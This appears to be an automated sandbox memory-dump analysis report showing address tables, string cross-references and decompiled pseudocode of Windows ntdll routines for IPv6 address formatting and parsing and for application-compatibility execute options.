                                                                                                                                                              0x00921b11
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008d8a48
                                                                                                                                                              0x008d8a51
                                                                                                                                                              0x008d8a5b
                                                                                                                                                              0x008d8a5e
                                                                                                                                                              0x008d8a61
                                                                                                                                                              0x008d8a69
                                                                                                                                                              0x008d8a69
                                                                                                                                                              0x008d8a6d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008d8a74
                                                                                                                                                              0x008d8a7c
                                                                                                                                                              0x008d8a7d
                                                                                                                                                              0x008d8a91
                                                                                                                                                              0x008d8a93
                                                                                                                                                              0x008d8a93
                                                                                                                                                              0x008d8a98
                                                                                                                                                              0x008d8a9b
                                                                                                                                                              0x008d8aa1
                                                                                                                                                              0x008d8aa1
                                                                                                                                                              0x008d8aa4
                                                                                                                                                              0x008d8aaa
                                                                                                                                                              0x008d8ab1
                                                                                                                                                              0x008d8ac5
                                                                                                                                                              0x008d8ac7
                                                                                                                                                              0x008d8ac7
                                                                                                                                                              0x008d8ac5
                                                                                                                                                              0x008d8ace
                                                                                                                                                              0x00921bc9
                                                                                                                                                              0x00921bce
                                                                                                                                                              0x00921bd2
                                                                                                                                                              0x00921bd2
                                                                                                                                                              0x008d8ad8
                                                                                                                                                              0x008d8aeb
                                                                                                                                                              0x008d8aeb
                                                                                                                                                              0x008d8af0
                                                                                                                                                              0x008d8af4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008d8af4
                                                                                                                                                              0x008d8a42
                                                                                                                                                              0x008d8926
                                                                                                                                                              0x008d8929
                                                                                                                                                              0x008d892c
                                                                                                                                                              0x008d892d
                                                                                                                                                              0x008d8930
                                                                                                                                                              0x008d8935
                                                                                                                                                              0x008d893a
                                                                                                                                                              0x008d8b51
                                                                                                                                                              0x008d8940
                                                                                                                                                              0x008d8954
                                                                                                                                                              0x008d8954
                                                                                                                                                              0x008d895a
                                                                                                                                                              0x00921b63
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008d8960
                                                                                                                                                              0x008d8969
                                                                                                                                                              0x008d8973
                                                                                                                                                              0x008d8976
                                                                                                                                                              0x008d8979
                                                                                                                                                              0x008d897e
                                                                                                                                                              0x008d8981
                                                                                                                                                              0x008d8981
                                                                                                                                                              0x008d8986
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00921b6e
                                                                                                                                                              0x00921b74
                                                                                                                                                              0x00921b7b
                                                                                                                                                              0x00921b8f
                                                                                                                                                              0x00921b91
                                                                                                                                                              0x00921b91
                                                                                                                                                              0x00921b99
                                                                                                                                                              0x00921b9c
                                                                                                                                                              0x00921ba2
                                                                                                                                                              0x00921ba2
                                                                                                                                                              0x008d898c
                                                                                                                                                              0x008d8992
                                                                                                                                                              0x008d8999
                                                                                                                                                              0x008d89ad
                                                                                                                                                              0x00921ba8
                                                                                                                                                              0x00921ba8
                                                                                                                                                              0x008d89ad
                                                                                                                                                              0x008d89b6
                                                                                                                                                              0x008d89c8
                                                                                                                                                              0x008d89cd
                                                                                                                                                              0x008d89d0
                                                                                                                                                              0x008d89d0
                                                                                                                                                              0x008d89d6
                                                                                                                                                              0x008d89e8
                                                                                                                                                              0x008d89e8
                                                                                                                                                              0x008d89ed
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008d89ed
                                                                                                                                                              0x008d895a
                                                                                                                                                              0x008d883e
                                                                                                                                                              0x008d8841
                                                                                                                                                              0x008d8844
                                                                                                                                                              0x008d8845
                                                                                                                                                              0x008d8848
                                                                                                                                                              0x008d884d
                                                                                                                                                              0x008d8852
                                                                                                                                                              0x008d8b49
                                                                                                                                                              0x008d8858
                                                                                                                                                              0x008d886c
                                                                                                                                                              0x008d886c
                                                                                                                                                              0x008d8872
                                                                                                                                                              0x00921b0e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008d8878
                                                                                                                                                              0x008d8881
                                                                                                                                                              0x008d888b
                                                                                                                                                              0x008d888e
                                                                                                                                                              0x008d8891
                                                                                                                                                              0x008d8896
                                                                                                                                                              0x008d8899
                                                                                                                                                              0x008d8899
                                                                                                                                                              0x008d889e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00921b21
                                                                                                                                                              0x00921b27
                                                                                                                                                              0x00921b2e
                                                                                                                                                              0x00921b42
                                                                                                                                                              0x00921b44
                                                                                                                                                              0x00921b44
                                                                                                                                                              0x00921b4c
                                                                                                                                                              0x00921b4f
                                                                                                                                                              0x00921b55
                                                                                                                                                              0x00921b55
                                                                                                                                                              0x008d88a4
                                                                                                                                                              0x008d88aa
                                                                                                                                                              0x008d88b1
                                                                                                                                                              0x008d88c5
                                                                                                                                                              0x00921b5b
                                                                                                                                                              0x00921b5b
                                                                                                                                                              0x008d88c5
                                                                                                                                                              0x008d88ce
                                                                                                                                                              0x008d88e0
                                                                                                                                                              0x008d88e5
                                                                                                                                                              0x008d88e8
                                                                                                                                                              0x008d88e8
                                                                                                                                                              0x008d88ee
                                                                                                                                                              0x008d8900
                                                                                                                                                              0x008d8900
                                                                                                                                                              0x008d8905
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008d8905

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • WindowsExcludedProcs, xrefs: 008D87C1
                                                                                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 008D8914
                                                                                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 008D87E6
                                                                                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 008D8827
                                                                                                                                                              • Kernel-MUI-Language-SKU, xrefs: 008D89FC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.2299696361.00000000008A0000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.2299683867.0000000000890000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299804221.0000000000980000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299812761.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299833424.0000000000994000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299855126.0000000000997000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299872905.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299932807.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcspbrk
                                                                                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                              • API String ID: 402402107-258546922
                                                                                                                                                              • Opcode ID: 68c5e4bfd9516345934af203e222a0592dbbc9521894bf302b461c4e06165277
                                                                                                                                                              • Instruction ID: 88df49fdd55989287d455ba40f8fd057618ee04c0e9e8da8cd77f1eb4e635b00
                                                                                                                                                              • Opcode Fuzzy Hash: 68c5e4bfd9516345934af203e222a0592dbbc9521894bf302b461c4e06165277
                                                                                                                                                              • Instruction Fuzzy Hash: 6BF1E2B2D00219EFCF11EF98C981DEEBBB8FB08304F14456AE505E7211EB35AA55DB61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008F13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 38%
                                                                                                                                                              			E008F13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E008E7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x8b2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E008E7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x8b9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E008E7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E008E7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E008E7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E008E7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                              0x008f13d5
                                                                                                                                                              0x008f13d9
                                                                                                                                                              0x008f13dc
                                                                                                                                                              0x008f13de
                                                                                                                                                              0x008f13e1
                                                                                                                                                              0x008f13e8
                                                                                                                                                              0x008f13ee
                                                                                                                                                              0x0091e8fd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091e921
                                                                                                                                                              0x0091e921
                                                                                                                                                              0x0091e928
                                                                                                                                                              0x0091e982
                                                                                                                                                              0x0091e98a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091e99a
                                                                                                                                                              0x0091e99e
                                                                                                                                                              0x0091e9a3
                                                                                                                                                              0x0091e9a8
                                                                                                                                                              0x0091e9b9
                                                                                                                                                              0x0091e978
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091e978
                                                                                                                                                              0x0091e98a
                                                                                                                                                              0x0091e92a
                                                                                                                                                              0x0091e931
                                                                                                                                                              0x0091e944
                                                                                                                                                              0x0091e944
                                                                                                                                                              0x0091e950
                                                                                                                                                              0x0091e954
                                                                                                                                                              0x0091e959
                                                                                                                                                              0x0091e95e
                                                                                                                                                              0x0091e963
                                                                                                                                                              0x0091e970
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091e975
                                                                                                                                                              0x0091e93b
                                                                                                                                                              0x0091e980
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091e980
                                                                                                                                                              0x0091e942
                                                                                                                                                              0x0091e94b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091e94b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091e942
                                                                                                                                                              0x008f13f4
                                                                                                                                                              0x008f13f4
                                                                                                                                                              0x008f13f9
                                                                                                                                                              0x008f13fc
                                                                                                                                                              0x008f13ff
                                                                                                                                                              0x008f1406
                                                                                                                                                              0x0091e9cc
                                                                                                                                                              0x0091e9d2
                                                                                                                                                              0x0091e9d2
                                                                                                                                                              0x0091e9cc
                                                                                                                                                              0x008f140c
                                                                                                                                                              0x008f1411
                                                                                                                                                              0x008f1431
                                                                                                                                                              0x008f143a
                                                                                                                                                              0x008f143c
                                                                                                                                                              0x008f143f
                                                                                                                                                              0x008f143f
                                                                                                                                                              0x008f1442
                                                                                                                                                              0x008f1447
                                                                                                                                                              0x008f14a8
                                                                                                                                                              0x008f14ac
                                                                                                                                                              0x0091e9e2
                                                                                                                                                              0x0091e9e7
                                                                                                                                                              0x0091e9ec
                                                                                                                                                              0x0091ea05
                                                                                                                                                              0x0091ea05
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f1449
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f1449
                                                                                                                                                              0x008f144c
                                                                                                                                                              0x008f1459
                                                                                                                                                              0x008f1462
                                                                                                                                                              0x008f1469
                                                                                                                                                              0x008f146a
                                                                                                                                                              0x008f1470
                                                                                                                                                              0x008f1473
                                                                                                                                                              0x008f1476
                                                                                                                                                              0x008f1476
                                                                                                                                                              0x008f1490
                                                                                                                                                              0x008f1495
                                                                                                                                                              0x008f138e
                                                                                                                                                              0x008f1390
                                                                                                                                                              0x008f1397
                                                                                                                                                              0x008f1398
                                                                                                                                                              0x008f1399
                                                                                                                                                              0x008f13a1
                                                                                                                                                              0x008f13a4
                                                                                                                                                              0x008f13a4
                                                                                                                                                              0x008f1498
                                                                                                                                                              0x008f149c
                                                                                                                                                              0x008f149f
                                                                                                                                                              0x008f14a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f14a4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f14a4
                                                                                                                                                              0x008f1413
                                                                                                                                                              0x008f1415
                                                                                                                                                              0x008f1416
                                                                                                                                                              0x008f1419
                                                                                                                                                              0x008f141c
                                                                                                                                                              0x008f1422
                                                                                                                                                              0x008f13b7
                                                                                                                                                              0x008f13bc
                                                                                                                                                              0x008f13bf
                                                                                                                                                              0x008f13bf
                                                                                                                                                              0x008f13c2
                                                                                                                                                              0x008f1424
                                                                                                                                                              0x008f1424
                                                                                                                                                              0x008f1424
                                                                                                                                                              0x008f1427
                                                                                                                                                              0x008f142b
                                                                                                                                                              0x008f142c
                                                                                                                                                              0x008f142c
                                                                                                                                                              0x008f142c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f141c
                                                                                                                                                              0x008f1411

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.2299696361.00000000008A0000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.2299683867.0000000000890000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299804221.0000000000980000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299812761.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299833424.0000000000994000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299855126.0000000000997000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299872905.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299932807.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                              • Opcode ID: d5603ee266e506923474952350228d89bd8477351a4ea4e3f3775361e65b36cd
                                                                                                                                                              • Instruction ID: 6792af1c482f2d2952d091c30527931ae57dc5acd3b4207398248ccfa4d69e17
                                                                                                                                                              • Opcode Fuzzy Hash: d5603ee266e506923474952350228d89bd8477351a4ea4e3f3775361e65b36cd
                                                                                                                                                              • Instruction Fuzzy Hash: A2610871A0065DE6CF24CF69C8948BEBBB6FFE5300714C12DE6D6C7641D634AA40DB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008E7EFD, Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 127COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                              			E008E7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x992088; // 0x77473921
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E008E7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00903F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E008BDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x994218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00903F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E008C0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00903F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E008C8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00903F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0092E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00903F92();
					_t38 = 1;
					L2:
					return E008BE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                              0x008e7f08
                                                                                                                                                              0x008e7f0f
                                                                                                                                                              0x008e7f12
                                                                                                                                                              0x008e7f1b
                                                                                                                                                              0x008e7f31
                                                                                                                                                              0x00903ead
                                                                                                                                                              0x00903eb4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00903eba
                                                                                                                                                              0x00903ecd
                                                                                                                                                              0x00903ed2
                                                                                                                                                              0x00903ee1
                                                                                                                                                              0x00903ee7
                                                                                                                                                              0x00903eec
                                                                                                                                                              0x00903f12
                                                                                                                                                              0x00903f18
                                                                                                                                                              0x00903f1a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00903f20
                                                                                                                                                              0x00903f26
                                                                                                                                                              0x00903f28
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00903f2e
                                                                                                                                                              0x00903f30
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00903f3a
                                                                                                                                                              0x00903f3b
                                                                                                                                                              0x00903f53
                                                                                                                                                              0x00903f64
                                                                                                                                                              0x00903f69
                                                                                                                                                              0x00903f6c
                                                                                                                                                              0x00903f6d
                                                                                                                                                              0x00903f6f
                                                                                                                                                              0x0090e304
                                                                                                                                                              0x0090e30f
                                                                                                                                                              0x0090e315
                                                                                                                                                              0x0090e31e
                                                                                                                                                              0x0090e321
                                                                                                                                                              0x0090e327
                                                                                                                                                              0x0090e329
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0090e32f
                                                                                                                                                              0x0090e32f
                                                                                                                                                              0x0090e337
                                                                                                                                                              0x0090e33a
                                                                                                                                                              0x0090e33b
                                                                                                                                                              0x0090e33d
                                                                                                                                                              0x0090e33f
                                                                                                                                                              0x0090e341
                                                                                                                                                              0x0090e341
                                                                                                                                                              0x0090e34e
                                                                                                                                                              0x0090e353
                                                                                                                                                              0x0090e358
                                                                                                                                                              0x0090e35d
                                                                                                                                                              0x0090e35f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0090e365
                                                                                                                                                              0x0090e365
                                                                                                                                                              0x0090e368
                                                                                                                                                              0x0090e36e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0090e374
                                                                                                                                                              0x0090e32f
                                                                                                                                                              0x00903f75
                                                                                                                                                              0x00903f7a
                                                                                                                                                              0x00903f7c
                                                                                                                                                              0x00903f7e
                                                                                                                                                              0x00903f86
                                                                                                                                                              0x008e7f39
                                                                                                                                                              0x008e7f47
                                                                                                                                                              0x008e7f47
                                                                                                                                                              0x008e7f37
                                                                                                                                                              0x008e7f37
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00903F12
                                                                                                                                                              Strings
                                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00903F75
                                                                                                                                                              • !9Gw, xrefs: 008E7F08
                                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 0090E345
                                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0090E2FB
                                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00903F4A
                                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00903EC4
                                                                                                                                                              • Execute=1, xrefs: 00903F5E
                                                                                                                                                              • 'K, xrefs: 008E7F1E
                                                                                                                                                              • ExecuteOptions, xrefs: 00903F04
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.2299696361.00000000008A0000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.2299683867.0000000000890000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299804221.0000000000980000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299812761.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299833424.0000000000994000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299855126.0000000000997000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299872905.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299932807.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BaseDataModuleQuery
                                                                                                                                                              • String ID: !9Gw$CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$'K
                                                                                                                                                              • API String ID: 3901378454-1298158139
                                                                                                                                                              • Opcode ID: df25d43bac58c0add01f87e4c4138c1773e6befe47e177c53a75984e6322ae5d
                                                                                                                                                              • Instruction ID: 4ada577935e60035f903a73705c35871fc0ba534f7506d99de7d4b56fd85391d
                                                                                                                                                              • Opcode Fuzzy Hash: df25d43bac58c0add01f87e4c4138c1773e6befe47e177c53a75984e6322ae5d
                                                                                                                                                              • Instruction Fuzzy Hash: 5641F771A8020DBADF20DA94DCC6FEA73BCFF55700F0005A9F215E62C1EA70AB458B61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008F0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E008F0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E008C8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E008BDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E008F0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E008F0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E008F06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E008F06BA(_t135, _t178) == 0 || E008F0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
